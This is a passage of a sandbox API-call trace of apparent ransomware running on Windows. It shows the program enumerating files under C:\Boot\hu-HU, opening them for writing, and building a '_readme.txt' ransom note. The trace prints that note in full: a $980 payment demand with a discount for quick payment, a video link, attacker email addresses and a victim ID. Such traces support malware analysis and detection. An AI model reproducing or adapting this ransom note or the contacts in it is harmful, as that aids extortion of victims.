hHeap=0x630000) returned 1 [0227.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.973] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.973] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.973] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.973] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.973] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.973] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.973] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.973] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.973] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.973] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.973] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.973] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.973] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.974] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.974] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0227.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.975] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.975] PathFindFileNameW (pszPath="C:\\Boot\\hu-HU\\") returned="hu-HU\\" [0227.975] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.975] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.975] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.976] PathFindFileNameW (pszPath="") returned="" [0227.976] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed788 [0227.976] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.976] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.976] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0227.976] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.976] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a2b08 [0227.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0227.977] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.977] PathAppendW (in: pszPath="C:\\Boot\\hu-HU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 1 [0227.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.977] PathFileExistsW (pszPath="C:\\Boot\\hu-HU\\_readme.txt") returned 0 [0227.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.977] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.977] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.977] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\_readme.txt" (normalized: "c:\\boot\\hu-hu\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.978] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.978] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.978] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7388 [0227.978] PathFindExtensionW (pszPath="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned=".mui" [0227.979] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b7388 | out: hHeap=0x630000) returned 1 [0227.979] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.979] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed850 | out: hHeap=0x630000) returned 1 [0227.980] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0227.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed850 [0227.980] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a3390 [0227.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a3390 [0227.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed6c0 | out: hHeap=0x630000) returned 1 [0227.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed6c0 [0227.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) returned 1 [0227.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, 